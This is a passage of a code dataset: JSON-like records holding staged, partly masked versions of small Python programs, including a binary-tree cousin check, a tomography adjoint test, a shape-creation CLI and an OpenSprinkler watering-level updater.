"step-2": "<mask token>\n\n\ndef isCousin(root, a, b):\n if check(root, a, b) == False:\n return False\n q = []\n q.insert(0, root)\n tmp = set()\n while len(q):\n l = len(q)\n for i in range(l):\n n = q.pop()\n tmp.add(n.data)\n if n.left:\n q.insert(0, n.left)\n if n.right:\n q.insert(0, n.right)\n if a in tmp and b in tmp:\n return True\n tmp.clear()\n return False\n",
"step-3": "def check(root, a, b):\n if root:\n if (root.left == a and root.right == b or root.left == b and root.\n right == a):\n return False\n return check(root.left, a, b) and check(root.right, a, b)\n return True\n\n\ndef isCousin(root, a, b):\n if check(root, a, b) == False:\n return False\n q = []\n q.insert(0, root)\n tmp = set()\n while len(q):\n l = len(q)\n for i in range(l):\n n = q.pop()\n tmp.add(n.data)\n if n.left:\n q.insert(0, n.left)\n if n.right:\n q.insert(0, n.right)\n if a in tmp and b in tmp:\n return True\n tmp.clear()\n return False\n",
"step-4": "def check(root, a, b):\n if root:\n if (root.left == a and root.right == b) or (root.left ==b and root.right==a):\n return False\n return check(root.left, a, b) and check(root.right, a, b)\n return True\ndef isCousin(root, a, b):\n # Your code here\n if check(root, a, b)==False:\n return False\n q=[]\n q.insert(0, root)\n tmp=set()\n while(len(q)):\n l = len(q)\n for i in range(l):\n n = q.pop()\n tmp.add(n.data)\n if n.left:\n q.insert(0, n.left)\n if n.right:\n q.insert(0, n.right)\n if a in tmp and b in tmp:\n return True\n tmp.clear()\n return False",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
u = dxchange.read_tiff('data/init_object.tiff')
u = u + 1.0j * u / 2
nz, n, _ = u.shape
center = n / 2
ntheta = 384
ne = 3 * n // 2
ngpus = 1
pnz = nz // 2
theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')
with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus
) as tslv:
data = tslv.fwd_tomo_batch(u)
with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n
) / 2, ngpus) as tslv:
data = ptychotomo.utils.paddata(data, ne)
ua = tslv.adj_tomo_batch(data)
ua = ptychotomo.utils.unpadobject(ua, n)
print(f'norm data = {np.linalg.norm(data)}')
print(f'norm object = {np.linalg.norm(ua)}')
print(
f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'
)
<|reserved_special_token_1|>
import numpy as np
import dxchange
import ptychotomo
if __name__ == '__main__':
u = dxchange.read_tiff('data/init_object.tiff')
u = u + 1.0j * u / 2
nz, n, _ = u.shape
center = n / 2
ntheta = 384
ne = 3 * n // 2
ngpus = 1
pnz = nz // 2
theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')
with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus
) as tslv:
data = tslv.fwd_tomo_batch(u)
with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n
) / 2, ngpus) as tslv:
data = ptychotomo.utils.paddata(data, ne)
ua = tslv.adj_tomo_batch(data)
ua = ptychotomo.utils.unpadobject(ua, n)
print(f'norm data = {np.linalg.norm(data)}')
print(f'norm object = {np.linalg.norm(ua)}')
print(
f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'
)
<|reserved_special_token_1|>
import numpy as np
import dxchange
import ptychotomo
if __name__ == "__main__":
# read object
u = dxchange.read_tiff('data/init_object.tiff')
u = u+1j*u/2
nz, n, _ = u.shape
# parameters
center = n/2
ntheta = 384
ne = 3*n//2
ngpus = 1
pnz = nz//2
theta = np.linspace(0, 4*np.pi, ntheta).astype('float32')
# simulate data
with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus) as tslv:
data = tslv.fwd_tomo_batch(u)
# adjoint test with data padding
with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center+(ne-n)/2, ngpus) as tslv:
data = ptychotomo.utils.paddata(data, ne)
ua = tslv.adj_tomo_batch(data)
ua = ptychotomo.utils.unpadobject(ua, n)
print(f'norm data = {np.linalg.norm(data)}')
print(f'norm object = {np.linalg.norm(ua)}')
print(
f'<u,R*Ru>=<Ru,Ru>: {np.sum(u*np.conj(ua)):e} ? {np.sum(data*np.conj(data)):e}')
|
flexible
|
{
"blob_id": "4ed6f4db4c9c3319d6289ba402f81bbd8accf915",
"index": 9782,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n u = dxchange.read_tiff('data/init_object.tiff')\n u = u + 1.0j * u / 2\n nz, n, _ = u.shape\n center = n / 2\n ntheta = 384\n ne = 3 * n // 2\n ngpus = 1\n pnz = nz // 2\n theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')\n with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus\n ) as tslv:\n data = tslv.fwd_tomo_batch(u)\n with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n\n ) / 2, ngpus) as tslv:\n data = ptychotomo.utils.paddata(data, ne)\n ua = tslv.adj_tomo_batch(data)\n ua = ptychotomo.utils.unpadobject(ua, n)\n print(f'norm data = {np.linalg.norm(data)}')\n print(f'norm object = {np.linalg.norm(ua)}')\n print(\n f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'\n )\n",
"step-3": "import numpy as np\nimport dxchange\nimport ptychotomo\nif __name__ == '__main__':\n u = dxchange.read_tiff('data/init_object.tiff')\n u = u + 1.0j * u / 2\n nz, n, _ = u.shape\n center = n / 2\n ntheta = 384\n ne = 3 * n // 2\n ngpus = 1\n pnz = nz // 2\n theta = np.linspace(0, 4 * np.pi, ntheta).astype('float32')\n with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus\n ) as tslv:\n data = tslv.fwd_tomo_batch(u)\n with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center + (ne - n\n ) / 2, ngpus) as tslv:\n data = ptychotomo.utils.paddata(data, ne)\n ua = tslv.adj_tomo_batch(data)\n ua = ptychotomo.utils.unpadobject(ua, n)\n print(f'norm data = {np.linalg.norm(data)}')\n print(f'norm object = {np.linalg.norm(ua)}')\n print(\n f'<u,R*Ru>=<Ru,Ru>: {np.sum(u * np.conj(ua)):e} ? {np.sum(data * np.conj(data)):e}'\n )\n",
"step-4": "import numpy as np\nimport dxchange\nimport ptychotomo\n\nif __name__ == \"__main__\":\n \n # read object\n u = dxchange.read_tiff('data/init_object.tiff')\n u = u+1j*u/2\n\n nz, n, _ = u.shape\n\n # parameters\n center = n/2\n ntheta = 384\n ne = 3*n//2\n ngpus = 1\n pnz = nz//2\n theta = np.linspace(0, 4*np.pi, ntheta).astype('float32')\n\n # simulate data\n with ptychotomo.SolverTomo(theta, ntheta, nz, n, pnz, center, ngpus) as tslv:\n data = tslv.fwd_tomo_batch(u)\n\n # adjoint test with data padding\n with ptychotomo.SolverTomo(theta, ntheta, nz, ne, pnz, center+(ne-n)/2, ngpus) as tslv:\n data = ptychotomo.utils.paddata(data, ne)\n ua = tslv.adj_tomo_batch(data)\n ua = ptychotomo.utils.unpadobject(ua, n)\n\n print(f'norm data = {np.linalg.norm(data)}')\n print(f'norm object = {np.linalg.norm(ua)}')\n print(\n f'<u,R*Ru>=<Ru,Ru>: {np.sum(u*np.conj(ua)):e} ? {np.sum(data*np.conj(data)):e}')\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from fractions import Fraction
import itertools
# With MOD
MOD = 10**9+7
def ncomb(n, r):
return reduce(lambda a, b: (a*b)%MOD, (Fraction(n-i, i+1) for i in range(r)), 1)
# No MOD
def ncomb(n, r):
return reduce(lambda a, b: (a*b), (Fraction(n-i, i+1) for i in range(r)), 1)
def comb(a, l):
return [subset for subset in itertools.combinations(a, l)]
def comball(a):
r = []
for l in range(0, len(a)+1):
r.extend(comb(a, l))
return r
|
normal
|
{
"blob_id": "2bc0d76e17f2f52fce9cc1925a3a0e0f53f5b81d",
"index": 7953,
"step-1": "<mask token>\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\n<mask token>\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-2": "<mask token>\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\n<mask token>\n\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-3": "<mask token>\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-4": "<mask token>\nMOD = 10 ** 9 + 7\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b % MOD, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef ncomb(n, r):\n return reduce(lambda a, b: a * b, (Fraction(n - i, i + 1) for i in\n range(r)), 1)\n\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\n\ndef comball(a):\n r = []\n for l in range(0, len(a) + 1):\n r.extend(comb(a, l))\n return r\n",
"step-5": "from fractions import Fraction\nimport itertools\n\n# With MOD\nMOD = 10**9+7\ndef ncomb(n, r):\n return reduce(lambda a, b: (a*b)%MOD, (Fraction(n-i, i+1) for i in range(r)), 1)\n\n# No MOD\ndef ncomb(n, r):\n return reduce(lambda a, b: (a*b), (Fraction(n-i, i+1) for i in range(r)), 1)\n\ndef comb(a, l):\n return [subset for subset in itertools.combinations(a, l)]\n\ndef comball(a):\n r = []\n for l in range(0, len(a)+1):\n r.extend(comb(a, l))\n return r\n",
"step-ids": [
2,
3,
4,
5,
7
]
}
|
[
2,
3,
4,
5,
7
] |
<|reserved_special_token_0|>
class FCreator(object):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
<|reserved_special_token_0|>
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FCreator(object):
<|reserved_special_token_0|>
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types
)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FCreator(object):
<|reserved_special_token_0|>
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types
)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
def getTypes(self) ->str:
return ''.join('{}\n'.format(t) for t in self.__types)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class FCreator(object):
__types = ['square', 'circle']
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types
)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) ->Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
def getTypes(self) ->str:
return ''.join('{}\n'.format(t) for t in self.__types)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import argparse
from figure import Figure
from figure.Circle import Circle
from figure.Square import Square
class FCreator(object):
__types = ['square', 'circle']
def createParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--type', required=True, choices=self.__types)
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', default=20, type=float)
parser.add_argument('-r', '--radius', default=20, type=float)
return parser.parse_args(line.split())
def editParser(self, line: str):
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--name', required=True)
parser.add_argument('-w', '--width', type=float)
parser.add_argument('-r', '--radius', type=float)
return parser.parse_args(line.split())
def create(self, line: str) -> Figure:
params = self.createParser(line)
if params.type == 'square':
return self.createSquare(params.name, params.width)
if params.type == 'circle':
return self.createCircle(params.name, params.radius)
def edit(self, params, figure: Figure):
if figure.type == 'square':
return self.createSquare(params.name, params.width)
if figure.type == 'circle':
return self.createCircle(params.name, params.radius)
def createSquare(self, name: str, width: float):
square = Square(name)
square.width(width)
return square
def createCircle(self, name: str, radius: float):
circle = Circle(name)
circle.radius(radius)
return circle
def getTypes(self) -> str:
return "".join("{}\n".format(t) for t in self.__types)
fcreator = FCreator()
|
flexible
|
{
"blob_id": "086ee4de1d74654ef85bd0a169fdf49c8f52bef2",
"index": 3792,
"step-1": "<mask token>\n\n\nclass FCreator(object):\n <mask token>\n <mask token>\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n <mask token>\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FCreator(object):\n <mask token>\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types\n )\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def edit(self, params, figure: Figure):\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass FCreator(object):\n <mask token>\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types\n )\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def edit(self, params, figure: Figure):\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n\n def getTypes(self) ->str:\n return ''.join('{}\\n'.format(t) for t in self.__types)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass FCreator(object):\n __types = ['square', 'circle']\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types\n )\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n return parser.parse_args(line.split())\n\n def create(self, line: str) ->Figure:\n params = self.createParser(line)\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def edit(self, params, figure: Figure):\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n\n def getTypes(self) ->str:\n return ''.join('{}\\n'.format(t) for t in self.__types)\n\n\n<mask token>\n",
"step-5": "import argparse\n\nfrom figure import Figure\nfrom figure.Circle import Circle\nfrom figure.Square import Square\n\n\nclass FCreator(object):\n __types = ['square', 'circle']\n\n def createParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--type', required=True, choices=self.__types)\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', default=20, type=float)\n parser.add_argument('-r', '--radius', default=20, type=float)\n\n return parser.parse_args(line.split())\n\n def editParser(self, line: str):\n parser = argparse.ArgumentParser()\n parser.add_argument('-n', '--name', required=True)\n parser.add_argument('-w', '--width', type=float)\n parser.add_argument('-r', '--radius', type=float)\n\n return parser.parse_args(line.split())\n\n\n\n def create(self, line: str) -> Figure:\n\n params = self.createParser(line)\n\n if params.type == 'square':\n return self.createSquare(params.name, params.width)\n\n if params.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n\n def edit(self, params, figure: Figure):\n\n if figure.type == 'square':\n return self.createSquare(params.name, params.width)\n\n if figure.type == 'circle':\n return self.createCircle(params.name, params.radius)\n\n def createSquare(self, name: str, width: float):\n square = Square(name)\n square.width(width)\n return square\n\n def createCircle(self, name: str, radius: float):\n circle = Circle(name)\n circle.radius(radius)\n return circle\n\n def getTypes(self) -> str:\n return \"\".join(\"{}\\n\".format(t) for t in self.__types)\n\n\nfcreator = FCreator()\n",
"step-ids": [
5,
7,
8,
9,
12
]
}
|
[
5,
7,
8,
9,
12
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for tc in range(1, T + 1):
N = int(input())
dot = [list(map(int, input().split())) for _ in range(N)]
ran = []
for a in range(N - 1):
for b in range(a + 1, N):
if dot[a][1] - dot[b][1] == 0:
if 'inf' not in ran:
ran.append('inf')
else:
K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])
if K not in ran:
ran.append(K)
print('#{} {}'.format(tc, len(ran)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.stdin = open('줄긋기.txt')
T = int(input())
for tc in range(1, T + 1):
N = int(input())
dot = [list(map(int, input().split())) for _ in range(N)]
ran = []
for a in range(N - 1):
for b in range(a + 1, N):
if dot[a][1] - dot[b][1] == 0:
if 'inf' not in ran:
ran.append('inf')
else:
K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])
if K not in ran:
ran.append(K)
print('#{} {}'.format(tc, len(ran)))
<|reserved_special_token_1|>
import sys
sys.stdin = open('줄긋기.txt')
T = int(input())
for tc in range(1, T + 1):
N = int(input())
dot = [list(map(int, input().split())) for _ in range(N)]
ran = []
for a in range(N - 1):
for b in range(a + 1, N):
if dot[a][1] - dot[b][1] == 0:
if 'inf' not in ran:
ran.append('inf')
else:
K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])
if K not in ran:
ran.append(K)
print('#{} {}'.format(tc, len(ran)))
|
flexible
|
{
"blob_id": "03854f48751460fdc27d42ee5c766934ee356cfd",
"index": 6161,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor tc in range(1, T + 1):\n N = int(input())\n dot = [list(map(int, input().split())) for _ in range(N)]\n ran = []\n for a in range(N - 1):\n for b in range(a + 1, N):\n if dot[a][1] - dot[b][1] == 0:\n if 'inf' not in ran:\n ran.append('inf')\n else:\n K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])\n if K not in ran:\n ran.append(K)\n print('#{} {}'.format(tc, len(ran)))\n",
"step-3": "<mask token>\nsys.stdin = open('줄긋기.txt')\nT = int(input())\nfor tc in range(1, T + 1):\n N = int(input())\n dot = [list(map(int, input().split())) for _ in range(N)]\n ran = []\n for a in range(N - 1):\n for b in range(a + 1, N):\n if dot[a][1] - dot[b][1] == 0:\n if 'inf' not in ran:\n ran.append('inf')\n else:\n K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])\n if K not in ran:\n ran.append(K)\n print('#{} {}'.format(tc, len(ran)))\n",
"step-4": "import sys\nsys.stdin = open('줄긋기.txt')\nT = int(input())\nfor tc in range(1, T + 1):\n N = int(input())\n dot = [list(map(int, input().split())) for _ in range(N)]\n ran = []\n for a in range(N - 1):\n for b in range(a + 1, N):\n if dot[a][1] - dot[b][1] == 0:\n if 'inf' not in ran:\n ran.append('inf')\n else:\n K = (dot[a][0] - dot[b][0]) / (dot[a][1] - dot[b][1])\n if K not in ran:\n ran.append(K)\n print('#{} {}'.format(tc, len(ran)))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
__author__ = 'lei'
import unittest
from ch3.node import TreeNode as t
import ch3.searchRange as sr
class MyTestCase(unittest.TestCase):
def test_1(self):
a = t(2)
b = t(1)
a.left = b
self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])
def test_2(self):
a = t(20)
b = t(1)
a.left = b
c = t(40)
a.right = c
d = t(35)
c.left = d
self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])
if __name__ == '__main__':
unittest.main()
|
normal
|
{
"blob_id": "c63e5a2178e82ec6e0e1e91a81145afb735bf7bf",
"index": 216,
"step-1": "<mask token>\n\n\nclass MyTestCase(unittest.TestCase):\n <mask token>\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_1(self):\n a = t(2)\n b = t(1)\n a.left = b\n self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-3": "__author__ = 'lei'\n<mask token>\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_1(self):\n a = t(2)\n b = t(1)\n a.left = b\n self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "__author__ = 'lei'\nimport unittest\nfrom ch3.node import TreeNode as t\nimport ch3.searchRange as sr\n\n\nclass MyTestCase(unittest.TestCase):\n\n def test_1(self):\n a = t(2)\n b = t(1)\n a.left = b\n self.assertEqual(sr.searchRange(a, 0, 4), [1, 2])\n\n def test_2(self):\n a = t(20)\n b = t(1)\n a.left = b\n c = t(40)\n a.right = c\n d = t(35)\n c.left = d\n self.assertEqual(sr.searchRange(a, 17, 37), [20, 35])\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": null,
"step-ids": [
2,
4,
5,
6
]
}
|
[
2,
4,
5,
6
] |
import os, sys, datetime, pytz, tzlocal, urllib.request, requests, csv, hashlib, json, boto3
uri = 'ftp://ftpcimis.water.ca.gov/pub2/daily/daily107.csv' #Station 107 is Santa Barbara
base_et = 0.15
def main():
try:
tempfile = tempfile_name()
get_datafile(tempfile)
except:
print("Could not retrieve datafile " + tempfile)
exit(-1)
et = get_yesterdays_et(tempfile)
if et == -1.0:
print("No et found for " + datestr)
exit(-1)
new_water_level = int(et/base_et * 100)
print("New Water Level will be %d" % new_water_level)
status = set_os_et(new_water_level)
notify(status)
exit(0)
def yesterday():
dt = datetime.datetime.now(datetime.timezone.utc)
local_timezone = tzlocal.get_localzone()
dt = dt.astimezone(local_timezone)
delta = datetime.timedelta(1)
dt = dt - delta
return datetime.datetime.strftime(dt, "%-m/%-d/%Y")
def get_yesterdays_et(tempfile):
datestr = yesterday()
et = -1.0
with open(tempfile, 'r') as tmp:
rdr = csv.reader(tmp)
for r in rdr:
if r[1] == datestr:
et = float(r[3])
print("Found et for " + datestr + ": " + str(et))
os.remove(tempfile)
return et
def tempfile_name():
return '/tmp/get_et_rate_' + str(datetime.datetime.now().timestamp()) + '.csv'
def get_datafile(tempfile):
global uri
urllib.request.urlretrieve(uri, tempfile)
def get_password():
try:
pw = os.environ['OPENSPRINKLER_PASSWORD']
except:
print("OpenSprinkler password not set in env variable OPENSPRINKLER_PASSWORD")
exit(-1)
pw = pw.encode('ascii')
m = hashlib.md5()
m.update(pw)
return m.hexdigest()
def set_os_et(new_water_level):
hash = get_password()
status = ""
r = requests.get('http://192.168.1.13/jo?pw=' + hash)
res = json.loads(r.text)
status = status + "Old water level: %s\n" % {res['wl']}
r = requests.get('http://192.168.1.13/co?pw=%s&o23=%d' % (hash, new_water_level))
r = requests.get('http://192.168.1.13/jo?pw=' + hash)
res = json.loads(r.text)
status = status + "Successfully set to new value %s\n" % {res['wl']}
return status
def notify(status):
session = boto3.Session(profile_name='trbryan')
sns = session.client('sns')
response = sns.publish(
TopicArn='arn:aws:sns:us-west-2:509611857908:opensprinkler_et_update',
Message=status,
Subject='Daily OpenSprinkler ET Adjustment',
MessageStructure='string',
)
if __name__ == "__main__": main()
|
normal
|
{
"blob_id": "4d82e68faa3102fc2949fd805588504b7d874589",
"index": 5457,
